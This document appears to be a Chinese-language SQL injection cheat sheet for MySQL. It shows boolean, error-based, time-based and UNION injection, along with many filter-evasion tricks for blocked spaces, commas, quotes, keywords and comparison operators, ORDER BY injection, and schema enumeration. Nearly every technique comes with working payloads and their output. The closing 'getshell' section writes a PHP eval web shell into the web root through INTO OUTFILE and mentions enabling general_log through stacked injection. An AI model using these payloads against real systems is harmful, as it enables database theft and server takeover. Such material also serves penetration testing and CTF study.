常见注入方式
1.Boolean-based blinds
1
2
3
4
5
6
7
8
9
10
11
12
|
mysql> select*from`test`where`id`=1 and left(version(),1)=8;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
mysql> select*from`test`where`id`=1 and ascii(substr((select table_name from information_schema.tables where table_schema=data base() limit 0,1),2,1))=101;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
|
2.Error-based
1
2
3
4
5
6
7
8
|
mysql> select * from test where id=1 union select version(),@@version_compile_os,floor(rand(0)*2)x from information_schema.character_sets group by x;
+--------+----------+----------------------------------+
| id | username | password |
+--------+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 8.0.12 | osx10.13 | 0 |
| 8.0.12 | osx10.13 | 1 |
+--------+----------+----------------------------------+
|
3.AND/OR time-based blind
1
2
3
4
5
6
7
8
9
10
11
12
13
|
mysql> select * from test where id=1 and sleep(2);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
Time: 2.053s
mysql> select * from test where id=1 or sleep(2);
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
Time: 6.226s
|
4.UNION query
1
2
3
4
5
6
7
8
9
|
mysql> select * from test where id=1 union select * from test;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb |
+----+----------+----------------------------------+
|
常用函数
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
concat:将多个字符串连接成一个字符串
group_concat:返回一个字符串结果,该结果由分组中的值连接组合而成
concat_ws: concat with separator 指定参数之间的分隔符
system_user():系统用户名
user():用户名
current_user:当前用户名
session_user():连接数据库的用户名
database():数据库名
version():数据库版本
load_file():读取本地文件的函数
@@datadir:读取数据库路径(5.0 以上版本)
@@basedir:安装路径
@@version_complie_os:操作系统
@@HOSTNAME 主机名 |
判断是否具有读写权限
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
读取
mysql> select*from`test`where`id`=1 and (select count(*) from mysql.user)>0
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
写入
mysql> select*from`test`where`id`=1 and (select count(file_priv) from mysql.user)>0
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
mysql> select*from`test`where`id`=1 and (select count(file_priv) from mysql.user)<0
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|
注入绕过
1.字段列数不够
1
2
3
4
5
6
7
8
9
10
11
|
mysql> select * from test where id=1 union select null,floor(rand(0)*2)x from information_schema.tables group by x;
(1222, u'The used SELECT statements have a different number of columns'')
mysql> select * from test where id=1 union select null,null,floor(rand(0)*2)x from information_schema.tables group by x; -- 用null或者其他字符填充
+--------+----------+----------------------------------+
| id | username | password |
+--------+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| <null> | <null> | 0 |
| <null> | <null> | 1 |
+--------+----------+----------------------------------+
|
2.过滤空格
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
|
mysql> select(username)from(test)where(id)=1;
+----------+
| username |
+----------+
| admin |
+----------+
mysql> select * from test where id=1E0union select 1,2,3 --浮点数 1.0
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 1 | 2 | 3 |
+----+----------+----------------------------------+
mysql> select*from/**/test/**/where/**/id=1;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
mysql> select*from`test`where`id`=2;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
+----+----------+----------------------------------+
mysql> select*from`test`where`id`=1 union select@1=@1,2,3;
+--------+----------+----------------------------------+
| id | username | password |
+--------+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| <null> | 2 | 3 |
+--------+----------+----------------------------------+
mysql> select*from`test`where`id`=1 union select@1,2,3;
+--------+----------+----------------------------------+
| id | username | password |
+--------+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| <null> | 2 | 3 |
+--------+----------+----------------------------------+
备注: 一个 @ 表示用户定义,@@ 表示系统变量
在php中 \s 会匹配0x09,0x0a,0x0b,0x0c,0x0d,0x20
09:Horizontal Tab
0A:New Line
0B:Vertical Tab
0C:New Page
0D:Carriage Return
A0:MySQL 中 %a0 代表空白符,可以代替空格
20:Space
a0:空格
2B:+
2D:-
7E:~
21:!
40:@
SQLite3:0A 0D 0C 09 20
MySQL5 09:0A 0B 0C 0D A0 20
PosgresSQL:0A 0D 0C 09 20
Oracle 11g:00 0A 0D 0C 09 20
MSSQL:01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20
|
3.过滤from x
1
2
3
4
5
6
7
8
9
|
mysql> select * from. test;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb |
+----+----------+----------------------------------+
|
4.过滤逗号
1
|
使用 mid(user() from 1 for 1) 或 substr(user() from 1 for 1) |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
|
mysql> select * from test where id=1 and (select ascii(substr(user() from 1 for 1)))=114;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
mysql> select * from test where id=1 and (substr(user() from 1 for 1))='r';
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
mysql> select * from test limit 1 offset 2;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 |
+----+----------+----------------------------------+
mysql> select * from ((select 1)A join (select 2)B join ((select username from test where id=2))D); -- 相当于:UNION SELECT 1,2,3;
+---+---+----------+
| 1 | 2 | username |
+---+---+----------+
| 1 | 2 | root |
+---+---+----------+
|
5.过滤大于小于
greatest(x,y),返回x和y中较大的那个数 当然可以用非等于 !=
1
2
3
4
5
6
7
|
mysql> select greatest(ascii(mid(user(),1,1)),120)=120;
+------------------------------------------+
| greatest(ascii(mid(user(),1,1)),120)=120 |
+------------------------------------------+
| 1 |
+------------------------------------------+
以上是判断user()第一个字符的ascii码是否等于120. 若最终结果为120,返回true(1),否则返回false(0),可编写脚本枚举
|
6.运算比较之空格过滤
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
|
mysql> select * from test where id=1-(ascii(mid((select(user()))from(1)for(1)))=110);
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
mysql> select * from test where id=1-(ascii(mid((select(user()))from(1)for(1)))=114);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
mysql> select * from test where id=1/(ascii(mid((select(user()))from(1)for(1)))=114);
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
mysql> select * from test where id=1/(ascii(mid((select(user()))from(1)for(1)))=115);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
乘法和除法当然也可以
|
7.过滤and or xor not
and=&& or=|| xor=| not=! 注意在浏览器中输入部分字符需要url编码,例如&&为%26%26
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
|
mysql> select * from test where id=1 || (ascii(substr(database(),1,1))=116);
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb |
+----+----------+----------------------------------+
mysql> select * from test where id=1 && (ascii(substr(database(),1,1))=116);
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
mysql> select * from test where id=1 && (ascii(substr(database(),1,1))=115);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
绕过:^, =, !=, %, /, *, &, &&, |, ||, <, >, >>, <<, >=, <=, <>, <=>, XOR, DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, BETWEEN, ...
|
8.万能密码之or and优先级
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
mysql> select * from test where username='nouser' or '1'='1' or '1'='1' -- - and password='123';
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb |
+----+----------+----------------------------------+
mysql> select * from test where username='nouser' and password='123' or '1'='1';
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb |
+----+----------+----------------------------------+
|
9.过滤引号
1
2
3
4
5
6
7
8
9
10
11
12
13
|
mysql> select * from test where username=0x61646d696e;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
mysql> select * from test where username=CHAR(97, 100, 109, 105, 110);
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
|
10.过滤tables
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
|
mysql> select table_name from information_schema.partitions where table_schema=database();
+------------+
| TABLE_NAME |
+------------+
| test |
+------------+
mysql> select table_name from information_schema.statistics where table_schema=database();
+------------+
| TABLE_NAME |
+------------+
| test |
+------------+
mysql> select table_name from information_schema.table_constraints where table_schema=database();
+------------+
| table_name |
+------------+
| test |
+------------+
mysql> select table_name from information_schema.KEY_COLUMN_USAGE where table_schema=database();
+------------+
| table_name |
+------------+
| test |
+------------+
|
11.过滤select
(布尔|延时)盲注即可,也可以参考第6条
1
2
3
4
5
6
7
8
9
10
11
12
|
mysql> select*from`test`where`id`=1 and ascii(substr(database(),1,1))=116;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
mysql> select*from`test`where`id`=1 and if(ascii(substr(database(),1,1))=116,sleep(5),1);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
Time: 5.081s
|
12.过滤union
盲注或者子查询猜解.最好还是编写脚本
1
2
3
4
5
6
|
mysql> select*from`test`where`id`=2 and (select username from test where id=1)='admin';
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
+----+----------+----------------------------------+
|
13. 过滤=
使用like 、rlike 、regexp 或者 使用< 或者 >
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
|
mysql> select * from test where id=1 union select 1,2,table_name from information_schema.tables where table_name between 0x61 and 0x7a;
+----+----------+------------------------------------------------------+
| id | username | password |
+----+----------+------------------------------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 1 | 2 | CHARACTER_SETS |
| 1 | 2 | COLLATION_CHARACTER_SET_APPLICABILITY |
| 1 | 2 | COLLATIONS |
| 1 | 2 | COLUMN_PRIVILEGES |
...................between char(97) and char(122).......................
+----+----------+------------------------------------------------------+
mysql> select*from`test`where`id`=1 and 1 like 2;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
mysql> select*from`test`where`id`=1 and 1 like 1;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
mysql> select 1,2,table_name from information_schema.tables where table_name between 'u' and 'v' limit 0,1;
+---+---+-----------------+
| 1 | 2 | TABLE_NAME |
+---+---+-----------------+
| 1 | 2 | USER_PRIVILEGES |
+---+---+-----------------+
mysql> select 1,2,table_name from information_schema.tables where table_name like 'u%' limit 1 offset 1;
+---+---+------------+
| 1 | 2 | TABLE_NAME |
+---+---+------------+
| 1 | 2 | users |
+---+---+------------+
mysql> select 1,2,table_name from information_schema.tables where table_name > 'u' and table_name < 'v' limit 10,1;
+---+---+--------------+
| 1 | 2 | TABLE_NAME |
+---+---+--------------+
| 1 | 2 | user_summary |
+---+---+--------------+
|
1
|
mysql> select*from`users`where`id`=1 AND polygon((select * from(select * from(select user())a)b));
|
ERROR 1367 (22007): Illegal non geometric ‘(select b.user() from (select ‘root@localhost’ AS user() from dual) b)’ value found during parsing
1
|
mysql> select*from`users`where`id`=1 AND GeometryCollection((select * from (select * from(select version())a)b));
|
ERROR 1367 (22007): Illegal non geometric ‘(select b.version() from (select ‘5.5.44-0ubuntu0.14.04.1’ AS version() from dual) b)’ value found during parsing
1
|
mysql> select*from`users`where`id`=1 AND multipoint((select * from(select * from(select @@basedir)a)b));
|
ERROR 1367 (22007): Illegal non geometric ‘(select b.@@basedir from (select ‘/usr’ AS @@basedir from dual) b)’ value found during parsing
1
|
mysql> select*from`users`where`id`=1 AND multilinestring((select * from(select * from(select database())a)b));
|
ERROR 1367 (22007): Illegal non geometric ‘(select b.database() from (select ‘test’ AS database() from dual) b)’ value found during parsing
1
|
mysql> select*from`users`where`id`=1 AND LINESTRING((select * from(select * from(select @@version_compile_os)a)b));
|
ERROR 1367 (22007): Illegal non geometric ‘(select b.@@version_compile_os from (select ‘debian-linux-gnu’ AS @@version_compile_os from dual) b)’ value found during parsing
1
|
mysql> select*from`users`where`id`=1 AND multipolygon((select * from(select * from(select @@datadir)a)b));
|
ERROR 1367 (22007): Illegal non geometric ‘(select b.@@datadir from (select ‘/var/lib/mysql/’ AS @@datadir from dual) b)’ value found during parsing
1
|
mysql> select*from`users`where`id`=1 and exp(~(select * from (select user() ) a) );
|
ERROR 1690 (22003): DOUBLE value is out of range in ‘exp(~((select ‘root@localhost’ from dual)))’
1
|
mysql> select*from`users`where`id`=1 union select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;
|
ERROR 1060 (42S21): Duplicate column name ‘5.5.44-0ubuntu0.14.04.1’
1
|
mysql> select*from`users`where`id`=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
|
ERROR 1062 (23000): Duplicate entry ‘5.5.44-0ubuntu0.14.04.11’ for key ‘group_key’
15.组合过滤之 preg_match('/(and|or|union|where)/i',$id)
上面基本介绍过了.大家都懂
1
2
3
4
5
|
1 || updatexml(1,concat(0x7e,database(),0x7e),1) -- 超过长度可以配合substr
1 %26%26 extractvalue(1,concat(0x7e,(select database()),0x7e))
1 || (select user from users limit 1) = 'admin'
1 %26%26 if(ascii(substr(database(),1,1))=115,sleep(5),1)
1 || ascii(substr(database(),1,1))=115
|
16.组合过滤之 preg_match('/(and|or|union|where|limit)/i', $id)
1
2
3
4
5
6
7
8
9
10
11
|
mysql> select*from`test` where id=2 || (select username from test group by id having id = 1) = 'admin';
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb |
+----+----------+----------------------------------+
报错注入或者盲注,最主要就是解决limit的问题.用having代替即可
|
17.组合过滤之 preg_match('/(and|or|union|where|limit|group by)/i', $id)
1
2
3
4
5
6
7
8
9
|
mysql> select*from`test` where id=2 || (select substr(group_concat(username),1,5) from test) = 'admin';
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb |
+----+----------+----------------------------------+
|
18.组合过滤之 preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
1
2
3
4
5
6
|
mysql> select*from`test` where id=-2 || substr(username,1,5) = 0x61646d696e;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
|
更新分割线
19.过滤 column
知道表名的前提下join报错爆字段
1
|
mysql> select*from`users`where`id`=1 union select 1,2,(select * from (select * from users a join users b) c);
|
ERROR 1060 (42S21): Duplicate column name ‘id’
1
|
mysql> select*from`users`where`id`=1 union select 1,2,(select * from (select * from users a join users b using(id)) c);
|
ERROR 1060 (42S21): Duplicate column name ‘username’
1
|
mysql> select*from`users`where`id`=1 union select 1,2,(select * from (select * from users a join users b using(id,username)) c);
|
ERROR 1060 (42S21): Duplicate column name ‘password’
20.order by 注入
基于报错
1
|
mysql> select*from`users`order by`id`=rand(updatexml(1,concat(0x7e,database(),0x7e),1));
|
ERROR 1105 (HY000): XPATH syntax error: ‘~test~’
1
|
mysql> select*from`users`order by`id`=1 and updatexml(1,concat(0x7e,database(),0x7e),1);
|
ERROR 1105 (HY000): XPATH syntax error: ‘~test~’
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
|
基于返回信息不同
mysql> select*from`users`order by`id`=1 and ascii(substr((select database()),1,1))>1;
+----+----------+----------------------------------+-----------+
| id | username | password | address |
+----+----------+----------------------------------+-----------+
| 2 | root | 63a9f0ea7bb98050796b649e85481845 | baidu.com |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 | 7xz.cc |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb | 04z.net |
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 | localhost |
+----+----------+----------------------------------+-----------+
mysql> select*from`users`order by`id`=1 and ascii(substr((select database()),1,1))<1;
+----+----------+----------------------------------+-----------+
| id | username | password | address |
+----+----------+----------------------------------+-----------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 | localhost |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 | baidu.com |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 | 7xz.cc |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb | 04z.net |
+----+----------+----------------------------------+-----------+
基于时间
mysql> select*from`users`order by`id`=1 and if(1=1,sleep(2),1);
+----+----------+----------------------------------+-----------+
| id | username | password | address |
+----+----------+----------------------------------+-----------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 | localhost |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 | baidu.com |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 | 7xz.cc |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb | 04z.net |
+----+----------+----------------------------------+-----------+
4 rows in set (2.01 sec)
|
tips
1
|
'=' <--> 'like' <--> 'in' --> 'regexp' <--> 'rlike' --> '>' <--> '<' |
1.爆所有表列
1
|
(SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x) |
2.利用报错发现库表列
1
|
mysql> select*from`users`where`username`='admin' and polygon(username);
|
(1367, u”Illegal non geometric ‘test.users.username’ value found during parsing”)
3.getshell
1
2
3
4
5
6
7
8
9
10
|
show variables like '%plugin%';
show variables like "secure_file_priv";
show variables like '%general_log%';
use mysql;
Drop TABLE IF EXISTS shell;
Create TABLE shell (shell text NOT NULL);
Insert INTO shell (shell) VALUES('<?php @eval($_POST[1]);?>');
select shell from shell into outfile '/var/www/html/1.php';
Drop TABLE IF EXISTS shell;
|
如果存在堆叠注入直接 id=1';set global general_log = on;